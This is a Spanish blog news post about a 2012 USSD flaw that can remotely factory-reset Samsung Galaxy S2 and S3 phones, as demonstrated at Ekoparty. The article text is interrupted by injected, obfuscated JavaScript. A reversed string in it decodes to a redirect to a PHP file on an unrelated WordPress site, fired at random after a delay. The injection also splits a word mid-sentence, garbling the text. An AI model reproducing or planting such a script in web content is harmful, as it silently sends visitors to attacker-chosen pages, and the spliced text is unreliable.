Samsung Galaxy S3 vulnerables a un reinicio remoto
Una sola línea de código embebido en una página web puede ser utilizada para provocar un reinicio de fábrica de forma remota en algunos Smartphones de Samsung, incluyendo el Galaxy S3 y S2, afirmó un investigador.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to2.jpg” alt=”” width=”500″ height=”325″ /></p>
<p>Propietarios de Smartphones Samsung Galaxy S2 y S3 posiblemente deban tener cuidado al abrir enlaces web recibidos a través de códigos QR, NFC o mensajes push, después de que un investigador de seguridad demostró que los teléfonos son potencialmente vulnerables a ser borrados remotamente.</p>
<p>Ravi Borgaonkar, un investigador en el departamen<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to de seguridad en comunicaciones de la Universidad Técnica de Berlin, demostró la vulnerabilidad en la conferencia de seguridad Ekoparty en Argentina, la semana pasada.
De acuerdo a Borgaonkar, la manera en que el Galaxy S3 utiliza el servicio suplementario de datos no estructurados (Unstructured Supplementary Service Data) lo deja extensamente abierto a una explotación a través de una sola línea de código malicioso embebido en una página web.
El servicio suplementario de datos no estructurados o USSD es utilizado para enviar mensajes entre un teléfono y un servidor de aplicación.
El código puede ser utilizado para provocar un reinicio de fábrica de un Galaxy S3, de acuerdo con el usuario de twitter @pof. Embebiéndolo en un simple frame automáticamente provocará un reinicio de fábrica no iniciado por el usuario en el dispositivo, añadió.
Sin embargo, navegar por el sitio web con el código embebido no provocará el reinicio, pero abriendo un mensaje a través de QR, NFC o WAP Push SMS sí lo hará. Cuando el enlace al sitio web se abre, comienza el borrado.
En la demostración de un video tomado durante la conferencia de seguridad Ekoparty, Borgaonkar dijo que la vulnerabilidad puede ser mitigada al desactivar la característica de ‘Servicio de Carga’ de Samsung.
Samsung no ha respondido a la solicitud de comentarios hasta el momento de escribir este artículo.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.